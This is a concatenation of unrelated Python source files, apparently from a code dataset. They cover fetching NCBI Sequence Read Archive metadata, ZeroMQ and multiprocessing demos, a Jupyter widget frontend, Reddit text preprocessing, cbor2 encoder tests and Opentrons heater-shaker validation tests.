# Define header section for CSV. Must match self.metadata.
self.header = ['id', 'accession', 'title', 'lineage',
'taxon_id', 'scientific_name',
'library_strategy', 'library_layout',
'instrument_model', 'run_accession',
'nreads', 'read_average', 'total_spots',
'total_bases', 'size', 'published']
# Do the actual metadata fetching.
self.efetch()
# Retrieve whole lineage by taxon ID.
self.get_lineage()
# Fill metadata set for later processing.
self.metadata = (self.id, self.accession, self.title, self.lineage,
self.taxon_id, self.scientific_name,
self.library_strategy, self.library_layout,
self.instrument_model, self.run_accession,
self.nreads, self.read_average, self.total_spots,
self.total_bases, self.size, self.published,)
print('Done!')
def efetch(self):
'''Fetch package metadata from Entrez'''
print('\nProcessing ID=%s' % self.id)
cached_file = self.cache()
if cached_file:
self.record = cached_file.read()
cached_file.close()
else:
print('Record not in cache. Fetching...')
handle = Entrez.efetch(db='sra', id=self.id)
self.record = handle.read()
# Write cache file.
new_cache = open(self.cached_filepath, 'w')
new_cache.write(self.record)
new_cache.close()
self.extract()
def cache(self):
'''Write and read cache files.'''
# Make sure folder exists.
cache_folder = '.cache'
if not os.path.isdir(cache_folder):
os.mkdir(cache_folder)
# Try to get cache file.
try:
cached = open(self.cached_filepath)
return cached
except:
return None
def extract(self):
'''Extract relevant fields from summary.'''
# Fields with attributes.
fields = {}
# Fields to be parsed.
regexes = {
'accession': '<EXPERIMENT\s+.*?accession="(?P<accession>.*?)".*?>',
'title': '<EXPERIMENT\s+.*?>.*?<TITLE>(?P<title>.*?)<\/TITLE>',
'study_title': '<STUDY_TITLE>(?P<study_title>.*?)<\/STUDY_TITLE>',
'library_strategy': '<LIBRARY_STRATEGY>(?P<library_strategy>.*?)<\/LIBRARY_STRATEGY>',
'library_layout': '<LIBRARY_LAYOUT>\s*<(?P<library_layout>SINGLE|PAIRED)',
'instrument_model': '<INSTRUMENT_MODEL>(?P<instrument_model>.*?)<\/INSTRUMENT_MODEL>',
'taxon_id': '<TAXON_ID>(?P<taxon_id>.*?)<\/TAXON_ID>',
'scientific_name': '<SCIENTIFIC_NAME>(?P<scientific_name>.*?)<\/SCIENTIFIC_NAME>',
'run_accession': '<RUN\s+.*?accession="(?P<run_accession>.*?)"\s+.*?total_spots="(?P<total_spots>.*?)"\s+.*?total_bases="(?P<total_bases>.*?)"\s+.*?size="(?P<size>.*?)"\s+.*?published="(?P<published>.*?)"\s+.*?>',
'nreads': '<Statistics\s+.*?nreads="(?P<nreads>.*?)"\s+.*?>',
'read_average': '<Read\s+.*?average="(?P<read_average>.*?)"\s+.*?\/>',
}
# Iterate over regexes to parse attributes.
# TODO handle multiple matches like "runs", "nreads", and "average"?
# Right now it only gets the first run accession, nreads and
# read_average. This is OK for now, since it is only a primary filter.
        for field, regex in regexes.items():
re_search = re.search(regex, self.record)
if re_search:
re_groups = re_search.groupdict()
if re_groups:
                    for k, v in re_groups.items():
fields[k] = v
else:
if field in ['taxon_id', 'nreads', 'read_average',
'total_spots', 'total_bases', 'size']:
fields[field] = 0
else:
fields[field] = ''
else:
if field in ['taxon_id', 'nreads', 'read_average',
'total_spots', 'total_bases', 'size']:
fields[field] = 0
else:
fields[field] = ''
self.accession = fields['accession']
self.title = fields['title']
if not self.title:
self.title = fields['study_title']
self.library_strategy = fields['library_strategy']
self.library_layout = fields['library_layout']
self.instrument_model = fields['instrument_model']
self.taxon_id = int(fields['taxon_id'])
self.scientific_name = fields['scientific_name']
# Catch nreads="variable". See https://github.com/nelas/sra.py/issues/1
try:
self.nreads = int(fields['nreads'])
except:
self.nreads = 1
self.read_average = int(float(fields['read_average']))
self.run_accession = fields['run_accession']
if self.run_accession:
self.total_spots = int(fields['total_spots'])
self.total_bases = int(fields['total_bases'])
self.size = int(fields['size'])
self.published = fields['published']
else:
self.total_spots = 0
self.total_bases = 0
self.size = 0
self.published = ''
def get_lineage(self):
'''Fetch hierarchy from NCBI's Taxonomy database.'''
# Open taxa cache file.
try:
cached_taxa = pd.DataFrame.from_csv('.cache/taxa.csv')
except:
cached_taxa = pd.DataFrame(columns=['taxon_id', 'lineage', 'scientific_name'])
# Fetch row with taxon_id.
taxon_row = cached_taxa[cached_taxa.taxon_id == self.taxon_id]
if not taxon_row.empty:
self.scientific_name = taxon_row.scientific_name.values[0]
self.lineage = taxon_row.lineage.values[0]
else:
print('Taxon %d not in cache. Fetching...' % self.taxon_id)
handle = Entrez.efetch(db='taxonomy', id=str(self.taxon_id))
taxon = Entrez.read(handle)
self.scientific_name = taxon[0]['ScientificName']
self.lineage = taxon[0]['Lineage'] + '; ' + self.scientific_name
new_cache = cached_taxa.append([{'taxon_id': self.taxon_id,
'lineage': self.lineage,
'scientific_name': self.scientific_name}])
new_cache.to_csv('.cache/taxa.csv')
class FilterPackages:
'''Build data frame with package metadata for filtering.'''
def __init__(self, packages, filter=None):
self.packages = packages
self.data_frame = None
self.build_data_frame()
self.filtered_data_frame = self.data_frame
def build_data_frame(self):
'''Get metadata from each package and save to data frame'''
data = []
index_ids = []
header = []
for package in self.packages:
data.append(package.metadata)
index_ids.append(package.metadata[0])
header = package.header
self.data_frame = pd.DataFrame(data, index=index_ids, columns=header)
def write_csv(self, basename):
'''Write CSV file from data frame.'''
self.data_frame.to_csv(basename + '_unfiltered' + '.csv', index=False)
self.filtered_data_frame.to_csv(basename + '.csv', index=False)
print('\n%d of %d packages written to "%s" after filtering.\n' % (self.filtered_data_frame.index.size, self.data_frame.index.size, basename + '.csv'))
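# Illustrative filtering sketch (not part of the original script); the column
# thresholds below are example values:
#
#   filtered = FilterPackages(packages)
#   df = filtered.data_frame
#   filtered.filtered_data_frame = df[(df.library_layout == 'PAIRED') &
#                                     (df.read_average >= 70)]
#   filtered.write_csv('filtered_output')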
def main():
'''Parse arguments and call SRA search.
Main function simply parses arguments from command line input and assures
everything is ok to instantiate the SRA search class.
'''
# Parse arguments.
parser = argparse.ArgumentParser(description='Search & Fetch records from NCBI\'s Sequence Read Archive.',
epilog='Work out those reads, dude.')
parser.add_argument('-s', '--search',
help='put search terms between "quotes"',
type=str, required=True)
parser.add_argument('-m', '--maximum',
help='maximum number of records to be retrieved',
default='20')
parser.add_argument('-o', '--output',
help='indicate output CSV file',
required=True)
parser.add_argument('-e', '--email',
help='an email address is required for Entrez',
required=True)
args = parser.parse_args()
# Instantiate search object.
sra_search = SRASearch(query=args.search, retmax=args.maximum,
email=args.email)
# Execute search itself.
sra_search.esearch()
# Fetch metadata from packages.
packages = [SRAPackage(sra_id) for sra_id in sra_search.idlist]
# Store packages in data frame for filtering.
packages_to_filter = FilterPackages(packages)
# Write CSV out.
packages_to_filter.write_csv(args.output)
if __name__ == '__main__':
main()
| 2.859375 | 3 |
concurrency/demo5.py | waveform80/presentations | 0 | 12759645 | <reponame>waveform80/presentations<gh_stars>0
import zmq
ctx = zmq.Context.instance()
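# One ROUTER socket bound in-process fans in requests from ten REQ clients;
# each message read off the ROUTER arrives as [identity, empty frame, payload].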
server = ctx.socket(zmq.ROUTER)
server.bind('inproc://foo')
clients = [ctx.socket(zmq.REQ) for i in range(10)]
for i, client in enumerate(clients):
client.connect('inproc://foo')
client.send_string('FOO%d' % i)
messages = []
while server.poll(0):
messages.append(server.recv_multipart())
for msg in messages:
print(repr(msg))
| 2.5625 | 3 |
concurrence/download_by_multi_process.py | dnxbjyj/python-basic | 3 | 12759646 | <reponame>dnxbjyj/python-basic
# coding:utf-8
# Download multiple web pages using multiple processes
import requests
from utils import urls,fn_timer
from multiprocessing import Process,Pool
def download_page(url):
resp = requests.get(url)
return resp
# Download the contents of multiple web pages using a process pool
@fn_timer
def download_using_process_pool(urls):
    # Create a process pool; the number is the maximum count of child processes running at once
pool = Pool(20)
    # List of return values
resps = []
    # Execute multiple tasks concurrently and collect their return values
resps = pool.map_async(requests.get,urls)
print 'Processes will start...'
pool.close()
pool.join()
    print 'All processes ended, results are: {0}'.format(resps.get())
return resps.get()
if __name__ == '__main__':
resps = download_using_process_pool(urls)
print len(resps) | 3.1875 | 3 |
algovera/jupyterfrontend.py | AlgoveraAI/jupyterlab_extensions | 2 | 12759647 | <filename>algovera/jupyterfrontend.py
#!/usr/bin/env python
# coding: utf-8
# Copyright (c) ipylab contributors.
# Distributed under the terms of the Modified BSD License.
import asyncio
from ipywidgets import CallbackDispatcher, Widget, register, widget_serialization
from traitlets import Instance, Unicode
from ._version import module_name, module_version
from .commands import CommandRegistry
from .shell import Shell
from .sessions import SessionManager
from .ocean_transaction import OceanMarket
@register
class JupyterFrontEnd(Widget):
_model_name = Unicode("JupyterFrontEndModel").tag(sync=True)
_model_module = Unicode(module_name).tag(sync=True)
_model_module_version = Unicode(module_version).tag(sync=True)
version = Unicode(read_only=True).tag(sync=True)
shell = Instance(Shell).tag(sync=True, **widget_serialization)
commands = Instance(CommandRegistry).tag(sync=True, **widget_serialization)
sessions = Instance(SessionManager).tag(sync=True, **widget_serialization)
def __init__(self, *args, **kwargs):
super().__init__(
*args,
shell=Shell(),
commands=CommandRegistry(),
sessions=SessionManager(),
            ocean=OceanMarket(),
**kwargs
)
self._ready_event = asyncio.Event()
self._on_ready_callbacks = CallbackDispatcher()
self.on_msg(self._on_frontend_msg)
self.private_key = ''
self.ocean = OceanMarket()
def _on_frontend_msg(self, _, content, buffers):
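        # The frontend reports readiness with an event string that begins with
        # "lab_ready", followed by a one-character separator and the private key.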
if content.get("event", "")[0:9] == "lab_ready":
self.private_key = content.get("event", "")[10:]
self._ready_event.set()
self._on_ready_callbacks()
if self.private_key != '':
self.ocean = OceanMarket(self.private_key)
async def ready(self):
await self._ready_event.wait()
def on_ready(self, callback, remove=False):
self._on_ready_callbacks.register_callback(callback, remove)
| 1.945313 | 2 |
src/preprocessing/preprocessing.py | pradeep90/reddit-post-classifier | 0 | 12759648 | # Source: https://medium.com/@datamonsters/text-preprocessing-in-python-steps-tools-and-examples-bf025f872908
# Note: the readability score comes out negative for most posts because of the way they are written.
import re
import pandas as pd
import numpy as np
import time
import nltk
nltk.download('wordnet') #TODO: should add this to the make file?
# for sentiment analysis
from textblob import TextBlob
# for readability score
import textstat
DEBUG = True
TIME_DEBUG = True
INCLUDE_SENTIMENT_FEATURE = False
INCLUDE_READABILITY_FEATURE = False
PATH_TO_DATA = '../../data/'
DATA_FILE_NAME = 'rspct.tsv'
DATA = PATH_TO_DATA+DATA_FILE_NAME
OUTPUT_FILE_NAME = 'rspct_preprocessed_sentiment_readability_stemmed.tsv'
def lowercase(df):
if DEBUG:
print('Lowercasing the dataset')
df=df.apply(lambda x: x.astype(str).str.lower())
return df
def remove_nums(df):
if DEBUG:
print('Removing numbers from all attributes except id')
for col in df.columns:
if col not in ['id']:
df[col] = df[col].str.replace('\d+', '')
return df
def remove_tags_puncts_whites(text):
text = text.strip()
# to remove > tags. TODO: there might be other such tags that need to be removed
p1 = re.compile(r'>|&|<')
text = p1.sub(' ', text)
# to remove tags inside {}, [] and HTML tags
p2 = re.compile(r'[<{\[].*?[>}\]]')
text = p2.sub(' ', text)
    # remove single quotes only if they precede or follow a word (the substitution
    # is applied twice to catch overlapping matches)
text1 = re.sub(r"((?P<a>\s)'(?P<x>\w))|((?P<y>\w)'(?P<b>\s))|((?P<c>\s)'(?P<d>\s))", r'\g<a>\g<x>\g<y>\g<b>\g<c>\g<d>', text)
text = re.sub(r"((?P<a>\s)'(?P<x>\w))|((?P<y>\w)'(?P<b>\s))|((?P<c>\s)'(?P<d>\s))", r'\g<a>\g<x>\g<y>\g<b>\g<c>\g<d>', text1)
text = text.strip("'")
# to remove punctuations (after removing tags etc.)
#puncts_to_remove = """!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~"""
puncts_to_remove = """!"#$%&()*+,-./:;<=>?@[\]^_`{|}~"""
text = text.translate({ord(c): ' ' for c in puncts_to_remove})
# print('ret:', text.strip())
return text.strip()
def remove_tags_puncts_whitespaces(data):
"""
Removes punctuations, HTML tags, and other tags inside {} or [] brackets and whitespaces
"""
if DEBUG:
print('Removing punctuations, tags and whitespaces')
for col in data.columns:
if col not in ['id', 'subreddit', 'sentiment_val', 'readability_score']:
data[col] = data[col].apply(remove_tags_puncts_whites)
return data
def stem_text(text):
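    """Stem each token of the text with NLTK's Porter stemmer."""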
stemmer = nltk.stem.PorterStemmer()
tokenized_text = nltk.tokenize.word_tokenize(text)
stemmed_words = [stemmer.stem(word) for word in tokenized_text]
#print('stemmed=',' '.join(stemmed_words))
return ' '.join(stemmed_words)
def stem_data(data):
"""
Replace all words with their stem words
"""
if DEBUG:
print ('Stemming the data')
for col in data.columns:
if col not in ['id', 'subreddit', 'sentiment_val', 'readability_score']:
data[col] = data[col].apply(stem_text)
return data
def lemmatize_text(text):
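    """Lemmatize each token of the text with NLTK's WordNet lemmatizer."""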
lemmatizer = nltk.stem.WordNetLemmatizer()
tokenized_text=nltk.tokenize.word_tokenize(text)
lemmatized_words = [lemmatizer.lemmatize(word) for word in tokenized_text]
#print('lemmatized:',' '.join(lemmatized_words))
return ' '.join(lemmatized_words)
def lemmatize_data(data):
if DEBUG:
print ('Lemmatizing the data')
for col in data.columns:
if col not in ['id', 'subreddit', 'sentiment_val', 'readability_score']:
data[col] = data[col].apply(lemmatize_text)
return data
def text_sentiment(text):
"""
Given input text, returns a scalar estimate of the sentiment of that text.
Polarity is float which lies in the range of [-1,1] where 1 means positive statement and -1 means a negative statement.
"""
# return indicoio.sentiment_hq(text)
return TextBlob(text).sentiment.polarity
def include_sentiment(data):
data['title_selftext'] = data['title'] + ' ' + data['selftext']
data['sentiment_val'] = data['title_selftext'].apply(text_sentiment)
data = data.drop(['title_selftext'], 1)
return data
def text_readability_score(text):
return textstat.flesch_reading_ease(text)
def include_readability_score(data):
data['title_selftext'] = data['title'] + ' ' + data['selftext']
data['readability_score'] = data['title_selftext'].apply(text_readability_score)
data = data.drop(['title_selftext'], 1)
return data
def preprocess(data):
t0 = time.time()
data = lowercase(data)
t1 = time.time()
if TIME_DEBUG:
print('Lowercasing took time: {}'.format(t1-t0))
t0 = time.time()
if INCLUDE_SENTIMENT_FEATURE:
data = include_sentiment(data)
if TIME_DEBUG:
print('Sentiment calculations took time: {}'.format(time.time()-t0))
t0 = time.time()
if INCLUDE_READABILITY_FEATURE:
data = include_readability_score(data)
if TIME_DEBUG:
print('Readability score calculations took time: {}'.format(time.time()-t0))
# t0 = time.time()
# data = remove_nums(data)
# t1 = time.time()
# if TIME_DEBUG:
# print('That took time: {}'.format(t1-t0))
"""
t0 = time.time()
data = remove_tags_puncts_whitespaces(data)
t1 = time.time()
if TIME_DEBUG:
print('Removing punctuations took time: {}'.format(t1-t0))
"""
"""
t0 = time.time()
data = stem_data(data)
t1 = time.time()
if DEBUG:
print('Stemming took time: {}'.format(t1-t0))
"""
"""
t0 = time.time()
data = lemmatize_data(data)
t1 = time.time()
if DEBUG:
print('Lemmatization took time: {}'.format(t1-t0))
"""
return data
def main():
if DEBUG:
print('Reading the data')
t0 = time.time()
df = pd.read_csv(DATA, sep='\t')
# df = pd.read_csv(DATA, sep='\t', nrows=1000)
preprocessed_df = preprocess(df)
# preprocessed_df.to_csv(OUTPUT_FILE_NAME, sep='\t', index=False)
t1 = time.time()
if TIME_DEBUG:
print('Total time taken: {}'.format(t1-t0))
if __name__ == '__main__':
main()
| 3 | 3 |
tests/test_encoder.py | bazurbat/cbor2 | 0 | 12759649 | import re
from binascii import unhexlify
from datetime import datetime, timedelta, date
from decimal import Decimal
from email.mime.text import MIMEText
from fractions import Fraction
from uuid import UUID
import pytest
from cbor2.compat import timezone
from cbor2.encoder import dumps, CBOREncodeError, dump, shareable_encoder
from cbor2.types import CBORTag, undefined, CBORSimpleValue
@pytest.mark.parametrize('value, expected', [
(0, '00'),
(1, '01'),
(10, '0a'),
(23, '17'),
(24, '1818'),
(100, '1864'),
(1000, '1903e8'),
(1000000, '1a000f4240'),
(1000000000000, '1b000000e8d4a51000'),
(18446744073709551615, '1bffffffffffffffff'),
(18446744073709551616, 'c249010000000000000000'),
(-18446744073709551616, '3bffffffffffffffff'),
(-18446744073709551617, 'c349010000000000000000'),
(-1, '20'),
(-10, '29'),
(-100, '3863'),
(-1000, '3903e7')
])
def test_integer(value, expected):
expected = unhexlify(expected)
assert dumps(value) == expected
@pytest.mark.parametrize('value, expected', [
(1.1, 'fb3ff199999999999a'),
(1.0e+300, 'fb7e37e43c8800759c'),
(-4.1, 'fbc010666666666666'),
(float('inf'), 'f97c00'),
(float('nan'), 'f97e00'),
(float('-inf'), 'f9fc00')
])
def test_float(value, expected):
expected = unhexlify(expected)
assert dumps(value) == expected
@pytest.mark.parametrize('value, expected', [
(b'', '40'),
(b'\x01\x02\x03\x04', '4401020304'),
])
def test_bytestring(value, expected):
expected = unhexlify(expected)
assert dumps(value) == expected
def test_bytearray():
expected = unhexlify('4401020304')
assert dumps(bytearray(b'\x01\x02\x03\x04')) == expected
@pytest.mark.parametrize('value, expected', [
(u'', '60'),
(u'a', '6161'),
(u'IETF', '6449455446'),
(u'"\\', '62225c'),
(u'\u00fc', '62c3bc'),
(u'\u6c34', '63e6b0b4')
])
def test_string(value, expected):
expected = unhexlify(expected)
assert dumps(value) == expected
@pytest.mark.parametrize('value, expected', [
(False, 'f4'),
(True, 'f5'),
(None, 'f6'),
(undefined, 'f7')
], ids=['false', 'true', 'null', 'undefined'])
def test_special(value, expected):
expected = unhexlify(expected)
assert dumps(value) == expected
@pytest.mark.parametrize('value, expected', [
(CBORSimpleValue(0), 'e0'),
(CBORSimpleValue(2), 'e2'),
(CBORSimpleValue(19), 'f3'),
(CBORSimpleValue(32), 'f820')
])
def test_simple_value(value, expected):
expected = unhexlify(expected)
assert dumps(value) == expected
#
# Tests for extension tags
#
@pytest.mark.parametrize('value, as_timestamp, expected', [
(datetime(2013, 3, 21, 20, 4, 0, tzinfo=timezone.utc), False,
'c074323031332d30332d32315432303a30343a30305a'),
(datetime(2013, 3, 21, 20, 4, 0, 380841, tzinfo=timezone.utc), False,
'c0781b323031332d30332d32315432303a30343a30302e3338303834315a'),
(datetime(2013, 3, 21, 22, 4, 0, tzinfo=timezone(timedelta(hours=2))), False,
'c07819323031332d30332d32315432323a30343a30302b30323a3030'),
(datetime(2013, 3, 21, 20, 4, 0), False, 'c074323031332d30332d32315432303a30343a30305a'),
(datetime(2013, 3, 21, 20, 4, 0, tzinfo=timezone.utc), True, 'c11a514b67b0'),
(datetime(2013, 3, 21, 22, 4, 0, tzinfo=timezone(timedelta(hours=2))), True, 'c11a514b67b0')
], ids=['datetime/utc', 'datetime+micro/utc', 'datetime/eet', 'naive', 'timestamp/utc',
'timestamp/eet'])
def test_datetime(value, as_timestamp, expected):
expected = unhexlify(expected)
assert dumps(value, datetime_as_timestamp=as_timestamp, timezone=timezone.utc) == expected
def test_date():
expected = unhexlify('c074323031332d30332d32315430303a30303a30305a')
assert dumps(date(2013, 3, 21), timezone=timezone.utc) == expected
def test_naive_datetime():
"""Test that naive datetimes are gracefully rejected when no timezone has been set."""
exc = pytest.raises(CBOREncodeError, dumps, datetime(2013, 3, 21))
exc.match('naive datetime encountered and no default timezone has been set')
@pytest.mark.parametrize('value, expected', [
(Decimal('14.123'), 'c4822219372b'),
(Decimal('NaN'), 'f97e00'),
(Decimal('Infinity'), 'f97c00'),
(Decimal('-Infinity'), 'f9fc00')
], ids=['normal', 'nan', 'inf', 'neginf'])
def test_decimal(value, expected):
expected = unhexlify(expected)
assert dumps(value) == expected
def test_rational():
expected = unhexlify('d81e820205')
assert dumps(Fraction(2, 5)) == expected
def test_regex():
expected = unhexlify('d8236d68656c6c6f2028776f726c6429')
assert dumps(re.compile(u'hello (world)')) == expected
def test_mime():
expected = unhexlify(
'd824787b436f6e74656e742d547970653a20746578742f706c61696e3b20636861727365743d2269736f2d38'
'3835392d3135220a4d494d452d56657273696f6e3a20312e300a436f6e74656e742d5472616e736665722d456'
'e636f64696e673a2071756f7465642d7072696e7461626c650a0a48656c6c6f203d413475726f')
message = MIMEText(u'Hello \u20acuro', 'plain', 'iso-8859-15')
assert dumps(message) == expected
def test_uuid():
expected = unhexlify('d825505eaffac8b51e480581277fdcc7842faf')
assert dumps(UUID(hex='5eaffac8b51e480581277fdcc7842faf')) == expected
def test_custom_tag():
expected = unhexlify('d917706548656c6c6f')
assert dumps(CBORTag(6000, u'Hello')) == expected
def test_cyclic_array():
"""Test that an array that contains itself can be serialized with value sharing enabled."""
expected = unhexlify('d81c81d81c81d81d00')
a = [[]]
a[0].append(a)
assert dumps(a, value_sharing=True) == expected
def test_cyclic_array_nosharing():
"""Test that serializing a cyclic structure w/o value sharing will blow up gracefully."""
a = []
a.append(a)
exc = pytest.raises(CBOREncodeError, dumps, a)
exc.match('cyclic data structure detected but value sharing is disabled')
def test_cyclic_map():
"""Test that a dict that contains itself can be serialized with value sharing enabled."""
expected = unhexlify('d81ca100d81d00')
a = {}
a[0] = a
assert dumps(a, value_sharing=True) == expected
def test_cyclic_map_nosharing():
"""Test that serializing a cyclic structure w/o value sharing will fail gracefully."""
a = {}
a[0] = a
exc = pytest.raises(CBOREncodeError, dumps, a)
exc.match('cyclic data structure detected but value sharing is disabled')
@pytest.mark.parametrize('value_sharing, expected', [
(False, '828080'),
(True, 'd81c82d81c80d81d01')
], ids=['nosharing', 'sharing'])
def test_not_cyclic_same_object(value_sharing, expected):
"""Test that the same shareable object can be included twice if not in a cyclic structure."""
expected = unhexlify(expected)
a = []
b = [a, a]
assert dumps(b, value_sharing=value_sharing) == expected
def test_unsupported_type():
exc = pytest.raises(CBOREncodeError, dumps, lambda: None)
exc.match('cannot serialize type function')
def test_default():
class DummyType(object):
def __init__(self, state):
self.state = state
def default_encoder(encoder, value):
encoder.encode(value.state)
expected = unhexlify('820305')
obj = DummyType([3, 5])
serialized = dumps(obj, default=default_encoder)
assert serialized == expected
def test_default_cyclic():
class DummyType(object):
def __init__(self, value=None):
self.value = value
@shareable_encoder
def default_encoder(encoder, value):
state = encoder.encode_to_bytes(value.value)
encoder.encode(CBORTag(3000, state))
expected = unhexlify('D81CD90BB849D81CD90BB843D81D00')
obj = DummyType()
obj2 = DummyType(obj)
obj.value = obj2
serialized = dumps(obj, value_sharing=True, default=default_encoder)
assert serialized == expected
def test_dump_to_file(tmpdir):
path = tmpdir.join('testdata.cbor')
with path.open('wb') as fp:
dump([1, 10], fp)
assert path.read_binary() == b'\x82\x01\x0a'
| 2.0625 | 2 |
api/tests/opentrons/protocol_api/test_module_validation_and_errors.py | Opentrons/protocol_framework | 0 | 12759650 | import pytest
from opentrons.protocol_api.module_validation_and_errors import (
validate_heater_shaker_temperature,
validate_heater_shaker_speed,
InvalidTargetTemperatureError,
InvalidTargetSpeedError,
)
@pytest.mark.parametrize("valid_celsius_value", [37.0, 37.1, 50, 94.99, 95])
def test_validate_heater_shaker_temperature(valid_celsius_value: float) -> None:
"""It should return the validated temperature value."""
validated = validate_heater_shaker_temperature(celsius=valid_celsius_value)
assert validated == valid_celsius_value
@pytest.mark.parametrize("invalid_celsius_value", [-1, 0, 36.99, 95.01])
def test_validate_heater_shaker_temperature_raises(
invalid_celsius_value: float,
) -> None:
"""It should raise an error for invalid temperature values."""
with pytest.raises(InvalidTargetTemperatureError):
validate_heater_shaker_temperature(celsius=invalid_celsius_value)
@pytest.mark.parametrize("valid_rpm_value", [200, 201, 1000, 2999, 3000])
def test_validate_heater_shaker_speed(valid_rpm_value: int) -> None:
"""It should return the validated speed value."""
validated = validate_heater_shaker_speed(rpm=valid_rpm_value)
assert validated == valid_rpm_value
@pytest.mark.parametrize("invalid_rpm_value", [0, 199, 3001])
def test_validate_heater_shaker_speed_raises(invalid_rpm_value: int) -> None:
"""It should raise an error for invalid speed values."""
with pytest.raises(InvalidTargetSpeedError):
validate_heater_shaker_speed(rpm=invalid_rpm_value)
| 2.78125 | 3 |